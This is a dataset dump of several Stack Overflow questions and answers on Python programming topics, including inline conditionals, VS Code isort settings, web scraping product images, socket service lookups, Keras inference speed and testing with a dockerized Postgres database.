content
stringlengths
85
101k
title
stringlengths
0
150
question
stringlengths
15
48k
answers
list
answers_scores
list
non_answers
list
non_answers_scores
list
tags
list
name
stringlengths
35
137
Q: How to use inline if statement am fairly new to programming and i don't get how the inline if statement works. i wanna do something like this: tries = 0 Numbers = "Hello world" for x in Numbers: (print(( f"found{x}" if x == "o" else None)), tries += 1 if x != "o" else 0) so if it does find x which is "o" it prints it else it adds 1 to tries, i tried multiple ways of doing it but none of them worked ( i know my code looks very weird and all but i'm still learning so please no bullying!) i tried many things none of them worked A: As others have already commented, this is not a good idea. It's hard to read and doesn't make anything better. Just to provide an actual answer to your question: tries = 0 Numbers = "Hello world" for x in Numbers: tries += 0 if x == "o" and not print(f"found{x}") else 1 When x is "o", then the second part of the condition will be checked, which checks if the print statement is not true. print should return None so not None becomes true, which means the condition is true and 0 will be added to tries. If x is not "o" then the condition is false and 1 will be added.
How to use inline if statement
am fairly new to programming and i don't get how the inline if statement works. i wanna do something like this: tries = 0 Numbers = "Hello world" for x in Numbers: (print(( f"found{x}" if x == "o" else None)), tries += 1 if x != "o" else 0) so if it does find x which is "o" it prints it else it adds 1 to tries, i tried multiple ways of doing it but none of them worked ( i know my code looks very weird and all but i'm still learning so please no bullying!) i tried many things none of them worked
[ "As others have already commented, this is not a good idea.\nIt's hard to read and doesn't make anything better.\n\nJust to provide an actual answer to your question:\ntries = 0\nNumbers = \"Hello world\"\nfor x in Numbers: tries += 0 if x == \"o\" and not print(f\"found{x}\") else 1\n\nWhen x is \"o\", then the second part of the condition will be checked, which checks if the print statement is not true. print should return None so not None becomes true, which means the condition is true and 0 will be added to tries. If x is not \"o\" then the condition is false and 1 will be added.\n" ]
[ 0 ]
[]
[]
[ "python" ]
stackoverflow_0074574312_python.txt
Q: How to configure line length for VS Code python Sort Imports in user settings? I'm using the Sort Imports function of the Python extension for VS Code. I'd like to configure the line length for this to 100; however, I've been unable to properly set this in my settings.json file. From the documentation, it seems like "python.sortImports.args": ["-l", "100"] should work, but it's giving me an error: Invalid patch string: Skipped 1 files. Any ideas? A: There is a known bug with using Sort Imports on __init__.py files. Here is the full solution to put in vscode's .vscode/settings.json: "python.sortImports.args": ["-ns", "__init__.py", "-l", "100"], A: Nowdays, it's adding: "isort.args": ["-l", "100"], to your settings file.
How to configure line length for VS Code python Sort Imports in user settings?
I'm using the Sort Imports function of the Python extension for VS Code. I'd like to configure the line length for this to 100; however, I've been unable to properly set this in my settings.json file. From the documentation, it seems like "python.sortImports.args": ["-l", "100"] should work, but it's giving me an error: Invalid patch string: Skipped 1 files. Any ideas?
[ "There is a known bug with using Sort Imports on __init__.py files. Here is the full solution to put in vscode's .vscode/settings.json:\n\"python.sortImports.args\": [\"-ns\", \"__init__.py\", \"-l\", \"100\"],\n\n", "Nowdays, it's adding:\n \"isort.args\": [\"-l\", \"100\"],\n\nto your settings file.\n" ]
[ 6, 0 ]
[]
[]
[ "python", "visual_studio_code", "vscode_settings" ]
stackoverflow_0052046251_python_visual_studio_code_vscode_settings.txt
Q: Doesn't remove duplicate strings in the list in one instance How do I make a for loop in elif choice == 2? let's say I have the list ["egg, "eGG", "radish", "pork", "meat"] from user input, if the user decides to remove egg, both egg and eGG should be removed. Here's my code: print(" MY GROCERY LIST ") #function that adds items, removes items, prints the list of items, exits the program with the user's will. def grocerylist(): grocery_list = [""] grocery = True #while loop while grocery: choice = str(input("=====================\nWhat would you like to do? \n1 - Add an item\n2 - Remove an item \n3 - Print entire list\n4 - Exit program\n\nChoice: ")) #conditionals #adds an item if choice == "1": print("=====================\nADD AN ITEM\n") add_item = str(input("What would you like to add? \nItem name: ")).format() #format function grocery_list.append(add_item) #removes an item elif choice == "2": print("=====================\nREMOVE AN ITEM\n") remove_item = str(input("What would you like to remove? \nItem name: ")).format() #format function grocery_list.remove(remove_item) #prints the entire list elif choice == "3": print("=====================\nPRINTING LIST...") #for loop to iterate grocery_list for i in grocery_list: print(i) #terminates the program elif choice == "4": print("=====================\nTerminating program...") break else: pass #calling of function grocerylist() I tried using a for loop but it didn't work. A: You can use a while loop to loop over all the items in the array, and then use call the lower() function on each element in the array list. This will make all the characters in an element lowercase and then you can compare. You would also have to lowercase the user input to compare correctly. elif choice == "2": print("=====================\nREMOVE AN ITEM\n") remove_item = str(input("What would you like to remove? \nItem name: ")) i = 0 while i < len(grocery_list): if grocery_list[i].lower() == remove_item.lower(): grocery_list.pop(i) else: i += 1 However, I would recommend using another array, and then appending the results that do not match the item you are trying to remove. The resulting tempArray will contain only the remaining items.
Doesn't remove duplicate strings in the list in one instance
How do I make a for loop in elif choice == 2? let's say I have the list ["egg, "eGG", "radish", "pork", "meat"] from user input, if the user decides to remove egg, both egg and eGG should be removed. Here's my code: print(" MY GROCERY LIST ") #function that adds items, removes items, prints the list of items, exits the program with the user's will. def grocerylist(): grocery_list = [""] grocery = True #while loop while grocery: choice = str(input("=====================\nWhat would you like to do? \n1 - Add an item\n2 - Remove an item \n3 - Print entire list\n4 - Exit program\n\nChoice: ")) #conditionals #adds an item if choice == "1": print("=====================\nADD AN ITEM\n") add_item = str(input("What would you like to add? \nItem name: ")).format() #format function grocery_list.append(add_item) #removes an item elif choice == "2": print("=====================\nREMOVE AN ITEM\n") remove_item = str(input("What would you like to remove? \nItem name: ")).format() #format function grocery_list.remove(remove_item) #prints the entire list elif choice == "3": print("=====================\nPRINTING LIST...") #for loop to iterate grocery_list for i in grocery_list: print(i) #terminates the program elif choice == "4": print("=====================\nTerminating program...") break else: pass #calling of function grocerylist() I tried using a for loop but it didn't work.
[ "You can use a while loop to loop over all the items in the array, and then use call the lower() function on each element in the array list. This will make all the characters in an element lowercase and then you can compare. You would also have to lowercase the user input to compare correctly.\nelif choice == \"2\":\n print(\"=====================\\nREMOVE AN ITEM\\n\")\n remove_item = str(input(\"What would you like to remove? \\nItem name: \"))\n i = 0\n while i < len(grocery_list):\n if grocery_list[i].lower() == remove_item.lower():\n grocery_list.pop(i)\n else:\n i += 1\n\nHowever, I would recommend using another array, and then appending the results that do not match the item you are trying to remove. The resulting tempArray will contain only the remaining items.\n" ]
[ 0 ]
[]
[]
[ "python" ]
stackoverflow_0074574364_python.txt
Q: How can you download all non-obvious images with Beautifulsoup/Selenium? I'm making next little project to learn - it's what I'm trying to do past few days, without success. I want to make list of opals, their prices...and download their images from website. At end (probably) here are two ways: assign opals to images (in word or excel) or just save images with name of opal+price. I succeed at making list of name+price (using help I gained from previous topics), but I can't get into images. They don't have .jpg, here is not 'src' and when I 'extracted' example img link, it was wrong, too. Take a look: /storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6364%2FF352%2FFF36%2F99BC%2F5F60%2F0A0C%2F6D0B%2FF3AC%2FIMG-8248VOLL_5_ECK.JPG&shop=80300026&width={width}&height=2560 EDIT: 'code edited, too' - I managed to extract just the list of img list I needed. Below is how img class of this website looks like: And my code is below - it doesn't download images yet :( import requests from bs4 import BeautifulSoup URL = 'https://www.koroit-opal-company.com/en/c/solid-opals' page = requests.get(URL) headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36"} soup = BeautifulSoup(requests.get(f'https://www.koroit-opal-company.com/en/c/solid-opals', headers=headers).text, "lxml") # print(soup.prettify()) names = [n.getText(strip=True) for n in soup.select("div div div a h2")] # print(names) prices = [n.getText(strip=True) for n in soup.select("div div div h3")] # print(prices) for name, price in zip(names, prices): print(f"{name} {price}") opal_list = soup.find('div', attrs = {'class':'content'}) #gives just fragment of website where opal imgs are imgs = opal_list.find_all('img') print(imgs) example = imgs[0] x = example.attrs['data-src'] print(x) result = soup.find_all(lambda tag: tag.name == 'img' and tag.get('class') == ['product-item-image']) print(result) A: you can use the API and all downloaded images ll be next to the executable file: import requests def get_info(page: int): url = f"https://www.koroit-opal-company.com/api/v2/products?sort=position-asc&resultsPerPage=12&page={page}&categoryId=551DDBD9-8AD4-229C-164A-C0A82AB9D825&locale=en_GB&shop=80300026" response = requests.get(url) for opal in response.json()['products']: img_link = 'https://www.koroit-opal-company.com' + opal['image']['url'] print(opal['name'], opal['price']['formatted'], img_link) download_image(img_link, opal['name']) def download_image(image_url: str, image_name: str): img_data = requests.get(image_url).content with open(image_name + '.jpg', 'wb') as handler: handler.write(img_data) get_info(1) OTPUT for page 1: 1,38 ct Boulder opal 70.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6364%2FF352%2FFF36%2F99BC%2F5F60%2F0A0C%2F6D0B%2FF3AC%2FIMG-8248VOLL_5_ECK.JPG&shop=80300026 4,27 ct Black opal 3,300.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F5A8D%2F6108%2F2341%2FEB00%2F2803%2F0A0C%2F6D04%2FCDD2%2FIMG-7618VOLL_5_ECK.JPG&shop=80300026 4,52 ct Boulder opal 80.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6364%2FF4E2%2FAFCE%2FF6ED%2F688E%2F0A0C%2F6D0F%2F3E17%2FIMG-8110VOLL_5_ECK.JPG&shop=80300026 0,85 ct Boulder opal 70.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6364%2FF540%2FD8D2%2FE5C6%2F9854%2F0A0C%2F6D0B%2F05BA%2FIMG-8018VOLL_5_ECK.JPG&shop=80300026 13,14 ct Crystal opal 400.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6286%2F56CC%2FED12%2F1E08%2FECEF%2F0A0C%2F6D0B%2F5AAC%2FIMG-9213_HOCH_MAI_22.JPG&shop=80300026 5,85 ct Boulder opal 80.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6364%2FF59C%2F77B0%2FF735%2F05AF%2F0A0C%2F6D0F%2F8E4C%2FIMG-7990VOLL_5_ECK.JPG&shop=80300026 11,38 ct Boulder opal 2,400.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F594A%2F94B3%2FC880%2FF5AB%2F848B%2FC0A8%2F2AB9%2F4A53%2FIMG-8598VOLL_5_ECK.JPG&shop=80300026 2,41 ct Crystal opal 60.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6364%2FF66A%2F867E%2F23D7%2FBF76%2F0A0C%2F6D0B%2F947B%2FIMG-8994VOLL_5_ECK.JPG&shop=80300026 6,94 ct Boulder opal 1,600.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F5AB9%2F3AB7%2F8F7A%2F659C%2FDDE4%2F0A0C%2F6D00%2FF73C%2FIMG-7672VOLL_5_ECK.JPG&shop=80300026 2,28 ct Crystal opal 70.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6364%2FF4D7%2FAEFE%2FF74C%2F9A52%2F0A0C%2F6D0B%2F0587%2FIMG-8045VOLL_5_ECK.JPG&shop=80300026 1,48 ct Crystal opal 70.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6364%2FF3B9%2F7E20%2F2E27%2FFB71%2F0A0C%2F6D0F%2FC782%2FIMG-8242VOLL_5_ECK.JPG&shop=80300026 11,29 ct Crystal opal 600.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6335%2FB93C%2F9276%2F3389%2FB532%2F0A0C%2F6D0B%2F3404%2FIMG-5671VOLL_5_ECK.JPG&shop=80300026 UPDATE: michalb93 asked how find api link: Press "Show more" button with open dev tools on network tab ctrl+f and search new opal's name, i search "2,75 ct Crystal opal" After pressing Enter, u get list of requests which contain this name, u can see it in the attached screenshot.
How can you download all non-obvious images with Beautifulsoup/Selenium?
I'm making next little project to learn - it's what I'm trying to do past few days, without success. I want to make list of opals, their prices...and download their images from website. At end (probably) here are two ways: assign opals to images (in word or excel) or just save images with name of opal+price. I succeed at making list of name+price (using help I gained from previous topics), but I can't get into images. They don't have .jpg, here is not 'src' and when I 'extracted' example img link, it was wrong, too. Take a look: /storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6364%2FF352%2FFF36%2F99BC%2F5F60%2F0A0C%2F6D0B%2FF3AC%2FIMG-8248VOLL_5_ECK.JPG&shop=80300026&width={width}&height=2560 EDIT: 'code edited, too' - I managed to extract just the list of img list I needed. Below is how img class of this website looks like: And my code is below - it doesn't download images yet :( import requests from bs4 import BeautifulSoup URL = 'https://www.koroit-opal-company.com/en/c/solid-opals' page = requests.get(URL) headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36"} soup = BeautifulSoup(requests.get(f'https://www.koroit-opal-company.com/en/c/solid-opals', headers=headers).text, "lxml") # print(soup.prettify()) names = [n.getText(strip=True) for n in soup.select("div div div a h2")] # print(names) prices = [n.getText(strip=True) for n in soup.select("div div div h3")] # print(prices) for name, price in zip(names, prices): print(f"{name} {price}") opal_list = soup.find('div', attrs = {'class':'content'}) #gives just fragment of website where opal imgs are imgs = opal_list.find_all('img') print(imgs) example = imgs[0] x = example.attrs['data-src'] print(x) result = soup.find_all(lambda tag: tag.name == 'img' and tag.get('class') == ['product-item-image']) print(result)
[ "you can use the API and all downloaded images ll be next to the executable file:\nimport requests\n\n\ndef get_info(page: int):\n url = f\"https://www.koroit-opal-company.com/api/v2/products?sort=position-asc&resultsPerPage=12&page={page}&categoryId=551DDBD9-8AD4-229C-164A-C0A82AB9D825&locale=en_GB&shop=80300026\"\n response = requests.get(url)\n for opal in response.json()['products']:\n img_link = 'https://www.koroit-opal-company.com' + opal['image']['url']\n print(opal['name'], opal['price']['formatted'], img_link)\n download_image(img_link, opal['name'])\n\n\ndef download_image(image_url: str, image_name: str):\n img_data = requests.get(image_url).content\n with open(image_name + '.jpg', 'wb') as handler:\n handler.write(img_data)\n\n\nget_info(1)\n\nOTPUT for page 1:\n1,38 ct Boulder opal 70.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6364%2FF352%2FFF36%2F99BC%2F5F60%2F0A0C%2F6D0B%2FF3AC%2FIMG-8248VOLL_5_ECK.JPG&shop=80300026\n4,27 ct Black opal 3,300.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F5A8D%2F6108%2F2341%2FEB00%2F2803%2F0A0C%2F6D04%2FCDD2%2FIMG-7618VOLL_5_ECK.JPG&shop=80300026\n4,52 ct Boulder opal 80.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6364%2FF4E2%2FAFCE%2FF6ED%2F688E%2F0A0C%2F6D0F%2F3E17%2FIMG-8110VOLL_5_ECK.JPG&shop=80300026\n0,85 ct Boulder opal 70.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6364%2FF540%2FD8D2%2FE5C6%2F9854%2F0A0C%2F6D0B%2F05BA%2FIMG-8018VOLL_5_ECK.JPG&shop=80300026\n13,14 ct Crystal opal 400.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6286%2F56CC%2FED12%2F1E08%2FECEF%2F0A0C%2F6D0B%2F5AAC%2FIMG-9213_HOCH_MAI_22.JPG&shop=80300026\n5,85 ct Boulder opal 80.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6364%2FF59C%2F77B0%2FF735%2F05AF%2F0A0C%2F6D0F%2F8E4C%2FIMG-7990VOLL_5_ECK.JPG&shop=80300026\n11,38 ct Boulder opal 2,400.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F594A%2F94B3%2FC880%2FF5AB%2F848B%2FC0A8%2F2AB9%2F4A53%2FIMG-8598VOLL_5_ECK.JPG&shop=80300026\n2,41 ct Crystal opal 60.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6364%2FF66A%2F867E%2F23D7%2FBF76%2F0A0C%2F6D0B%2F947B%2FIMG-8994VOLL_5_ECK.JPG&shop=80300026\n6,94 ct Boulder opal 1,600.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F5AB9%2F3AB7%2F8F7A%2F659C%2FDDE4%2F0A0C%2F6D00%2FF73C%2FIMG-7672VOLL_5_ECK.JPG&shop=80300026\n2,28 ct Crystal opal 70.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6364%2FF4D7%2FAEFE%2FF74C%2F9A52%2F0A0C%2F6D0B%2F0587%2FIMG-8045VOLL_5_ECK.JPG&shop=80300026\n1,48 ct Crystal opal 70.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6364%2FF3B9%2F7E20%2F2E27%2FFB71%2F0A0C%2F6D0F%2FC782%2FIMG-8242VOLL_5_ECK.JPG&shop=80300026\n11,29 ct Crystal opal 600.00 € https://www.koroit-opal-company.com/storage/images/image?remote=https%3A%2F%2Fwww.koroit-opal-company.com%2FWebRoot%2FStore15%2FShops%2F80300026%2F6335%2FB93C%2F9276%2F3389%2FB532%2F0A0C%2F6D0B%2F3404%2FIMG-5671VOLL_5_ECK.JPG&shop=80300026\n\nUPDATE:\nmichalb93 asked how find api link:\n\nPress \"Show more\" button with open dev tools on network tab\nctrl+f and search new opal's name, i search \"2,75 ct Crystal opal\"\nAfter pressing Enter, u get list of requests which contain this name, u can see it in the attached screenshot.\n\n\n" ]
[ 2 ]
[]
[]
[ "beautifulsoup", "html", "python", "selenium", "web_scraping" ]
stackoverflow_0074574105_beautifulsoup_html_python_selenium_web_scraping.txt
Q: how do I make the independent variables columns and targets into variables X and y how do I make the independent variables columns and targets into variables X and y #independent columns --> SepalLengthCm, SepalWidthCm, PetalLengthCm, PetalWidthCm X = df1.<...> #target columns --> species y = df1.<...> A: you can do the following. x = df.iloc[:, [0, 1, 2, 3]].values Here you use iloc Docs, so you take all elements (:) from columns with index [0,1,2,3] then you take the values because iloc returns pandas object. For target, you can do the following. y = df.iloc[:, [4]].values This dataset is really popular, here you can find a lot of examples exploring and working with it Iris examples.
how do I make the independent variables columns and targets into variables X and y
how do I make the independent variables columns and targets into variables X and y #independent columns --> SepalLengthCm, SepalWidthCm, PetalLengthCm, PetalWidthCm X = df1.<...> #target columns --> species y = df1.<...>
[ "you can do the following.\nx = df.iloc[:, [0, 1, 2, 3]].values\n\nHere you use iloc Docs, so you take all elements (:) from columns with index [0,1,2,3] then you take the values because iloc returns pandas object.\nFor target, you can do the following.\ny = df.iloc[:, [4]].values\n\nThis dataset is really popular, here you can find a lot of examples exploring and working with it Iris examples.\n" ]
[ 0 ]
[]
[]
[ "jupyter_notebook", "python" ]
stackoverflow_0074574291_jupyter_notebook_python.txt
Q: OSError: port/proto not found in for loop I wrote a python script using the socket module, which provides getservbyport for retrieving a service name based on a port number argument. I used the following code: import socket socket.getservbyport(443) # 'https' But with certain port numbers i'm getting the following error: socket.getservbyport(675) Traceback (most recent call last): File "<pyshell#1>", line 1, in <module> socket.getservbyport(675) OSError: port/proto not found Can someone explain to me why i am getting this error? Also i want to list the services with their matching port, so I eliminated the errors using try and except method like the following code: for i in range(0,65536,1): try: print(i,"Runs, service:",socket.getservbyport(i)) except: continue I'm getting the ports which have a service, but I want to list the serial numbers before the port numbers. Since I used except method the errors are eliminated so I can't number them. A: The error OSError: port/proto not found is thrown when no service is found on that port. So if you're iterating through all possible ports, odds are you will almost certainly get that error. Catching the error is the right way to go. To achieve what you need, use a separate counter to keep track of the number of services found: counter = 1 for i in range(0, 65536): try: service = socket.getservbyport(i) print(counter, " port nr ", i, " runs service ", service) counter += 1 except: continue Alternatively if you would like the services data elsewhere, store the services in-order in an array, like so: services = [] for i in range(0, 65536): service = None try: service = socket.getservbyport(i) except: pass if service is not None: services += [{'service': service, 'port': i}] for idx, s in enumerate(services): print(idx, " port nr ", s['port'], " runs service ", s['service']) A: You can solve the problem of OSError: port/proto not found by adding the tcp protocol like this import socket print(socket.getservbyport(22, "tcp"))
OSError: port/proto not found in for loop
I wrote a python script using the socket module, which provides getservbyport for retrieving a service name based on a port number argument. I used the following code: import socket socket.getservbyport(443) # 'https' But with certain port numbers i'm getting the following error: socket.getservbyport(675) Traceback (most recent call last): File "<pyshell#1>", line 1, in <module> socket.getservbyport(675) OSError: port/proto not found Can someone explain to me why i am getting this error? Also i want to list the services with their matching port, so I eliminated the errors using try and except method like the following code: for i in range(0,65536,1): try: print(i,"Runs, service:",socket.getservbyport(i)) except: continue I'm getting the ports which have a service, but I want to list the serial numbers before the port numbers. Since I used except method the errors are eliminated so I can't number them.
[ "The error OSError: port/proto not found is thrown when no service is found on that port. So if you're iterating through all possible ports, odds are you will almost certainly get that error. Catching the error is the right way to go.\nTo achieve what you need, use a separate counter to keep track of the number of services found:\ncounter = 1\nfor i in range(0, 65536):\n try:\n service = socket.getservbyport(i)\n print(counter, \" port nr \", i, \" runs service \", service)\n counter += 1\n except:\n continue\n\nAlternatively if you would like the services data elsewhere, store the services in-order in an array, like so:\nservices = []\nfor i in range(0, 65536):\n service = None\n try:\n service = socket.getservbyport(i)\n except:\n pass\n if service is not None:\n services += [{'service': service, 'port': i}]\n\nfor idx, s in enumerate(services):\n print(idx, \" port nr \", s['port'], \" runs service \", s['service'])\n\n", "You can solve the problem of\nOSError: port/proto not found\nby adding the tcp protocol like this\nimport socket\nprint(socket.getservbyport(22, \"tcp\"))\n\n" ]
[ 3, 0 ]
[]
[]
[ "for_loop", "network_programming", "python", "sockets" ]
stackoverflow_0037644773_for_loop_network_programming_python_sockets.txt
Q: Keras model predict iteration getting slower. Hi I have some problem about Keras with python 3.6 My enviroment is keras with Python and Only CPU. but the problem is when I iterate same Keras model for predict some diferrent input, its getting slower and slower.. my code is so simple just like that for i in range(100): model.predict(x) the First run is fast. it takes 2 seconds may be. but second run takes 3 seconds and Third takes 5 seconds... its getting slower and slower even if I use same input. what can I iterate predict keras model hold fast? I don't want any getting slower.. it will be very critical. How can I Fix IT?? A: Try using the __call__ method directly. The documentation of the predict method states the following: For small numbers of inputs that fit in one batch, directly use __call__() for faster execution, e.g., model(x). I see the performance is critical in this case. So, if it doesn't help, you could use OpenVINO which is optimized for Intel hardware but it should work with any CPU. Your performance should be much better than using Keras directly. It's rather straightforward to convert the Keras model to OpenVINO. The full tutorial on how to do it can be found here. Some snippets below. Install OpenVINO The easiest way to do it is using PIP. Alternatively, you can use this tool to find the best way in your case. pip install openvino-dev[tensorflow2] Save your model as SavedModel OpenVINO is not able to convert HDF5 model, so you have to save it as SavedModel first. import tensorflow as tf from custom_layer import CustomLayer model = tf.keras.models.load_model('model.h5', custom_objects={'CustomLayer': CustomLayer}) tf.saved_model.save(model, 'model') Use Model Optimizer to convert SavedModel model The Model Optimizer is a command-line tool that comes from OpenVINO Development Package. It converts the Tensorflow model to IR, which is a default format for OpenVINO. You can also try the precision of FP16, which should give you better performance without a significant accuracy drop (change data_type). Run in the command line: mo --saved_model_dir "model" --data_type FP32 --output_dir "model_ir" Run the inference The converted model can be loaded by the runtime and compiled for a specific device e.g. CPU or GPU (integrated into your CPU like Intel HD Graphics). If you don't know what is the best choice for you, use AUTO. # Load the network ie = Core() model_ir = ie.read_model(model="model_ir/model.xml") compiled_model_ir = ie.compile_model(model=model_ir, device_name="CPU") # Get output layer output_layer_ir = compiled_model_ir.output(0) # Run inference on the input image result = compiled_model_ir([input_image])[output_layer_ir] Disclaimer: I work on OpenVINO.
Keras model predict iteration getting slower.
Hi I have some problem about Keras with python 3.6 My enviroment is keras with Python and Only CPU. but the problem is when I iterate same Keras model for predict some diferrent input, its getting slower and slower.. my code is so simple just like that for i in range(100): model.predict(x) the First run is fast. it takes 2 seconds may be. but second run takes 3 seconds and Third takes 5 seconds... its getting slower and slower even if I use same input. what can I iterate predict keras model hold fast? I don't want any getting slower.. it will be very critical. How can I Fix IT??
[ "Try using the __call__ method directly. The documentation of the predict method states the following:\n\nFor small numbers of inputs that fit in one batch, directly use __call__() for faster execution, e.g., model(x).\n\nI see the performance is critical in this case. So, if it doesn't help, you could use OpenVINO which is optimized for Intel hardware but it should work with any CPU. Your performance should be much better than using Keras directly.\nIt's rather straightforward to convert the Keras model to OpenVINO. The full tutorial on how to do it can be found here. Some snippets below.\nInstall OpenVINO\nThe easiest way to do it is using PIP. Alternatively, you can use this tool to find the best way in your case.\npip install openvino-dev[tensorflow2]\n\nSave your model as SavedModel\nOpenVINO is not able to convert HDF5 model, so you have to save it as SavedModel first.\nimport tensorflow as tf\nfrom custom_layer import CustomLayer\nmodel = tf.keras.models.load_model('model.h5', custom_objects={'CustomLayer': CustomLayer})\ntf.saved_model.save(model, 'model')\n\nUse Model Optimizer to convert SavedModel model\nThe Model Optimizer is a command-line tool that comes from OpenVINO Development Package. It converts the Tensorflow model to IR, which is a default format for OpenVINO. You can also try the precision of FP16, which should give you better performance without a significant accuracy drop (change data_type). Run in the command line:\nmo --saved_model_dir \"model\" --data_type FP32 --output_dir \"model_ir\"\n\nRun the inference\nThe converted model can be loaded by the runtime and compiled for a specific device e.g. CPU or GPU (integrated into your CPU like Intel HD Graphics). If you don't know what is the best choice for you, use AUTO.\n# Load the network\nie = Core()\nmodel_ir = ie.read_model(model=\"model_ir/model.xml\")\ncompiled_model_ir = ie.compile_model(model=model_ir, device_name=\"CPU\")\n\n# Get output layer\noutput_layer_ir = compiled_model_ir.output(0)\n\n# Run inference on the input image\nresult = compiled_model_ir([input_image])[output_layer_ir]\n\nDisclaimer: I work on OpenVINO.\n" ]
[ 0 ]
[ "If your model calls the fit function in batches, there are different samples in the same batch with slightly different times over the course of the iteration, and then you try again and again to get more and more groups of predictive model performance time will be longer and longer.\n" ]
[ -1 ]
[ "keras", "python", "tensorflow" ]
stackoverflow_0049777263_keras_python_tensorflow.txt
Q: Using pytest with a dockerized Postgres database I'm currently creating a separate database for the sake of my tests. Is there any better solution to run the test suite when the database is running in Docker and I don't want my tests to mess up my production database? A: You are already using a dockerized database as your "production database". You could add a second dockerized database as a "develop database". This second instance should replicate the production database, and be spun up / torn down as part of the test suite. Advantages of using dockerized database instances as part of the test environment Ensures that the development environment mimics production Allows to test database migrations before deploying to a production environment Allows to test queries before running them in production Once setup, maintenance can be easier than the maintenance of mocked data interfaces Advantages of mocking database connections in the test environment Initial setup is easier Smaller project stack (e.g. Docker potentially not required) Generally speaking, I personally go for the second approach just for small projects, and spend the time to set up a proper dockerized local environment for any medium or large project. On a different note, to the additional question in comments of the OP: for my CI/CD pipeline have no idea how to do the test stage without this [create a new database and running a migration] manual procedure Generally speaking, a suggested approach would be to: Bundle any required dockerized interface in a docker-compose.yml Create an entrypoint (this can be a Python function) that creates a database, runs database migrations and loads mock data to the database Run tests The exact commands on CI could look something like: - docker-compose up # Initialize database instance - make dev-environment # Call a Makefile recipe to create the database, run migrations and load mock data - make tests # Call a Makefile recipe to run the test suite
Using pytest with a dockerized Postgres database
I'm currently creating a separate database for the sake of my tests. Is there any better solution to run the test suite when the database is running in Docker and I don't want my tests to mess up my production database?
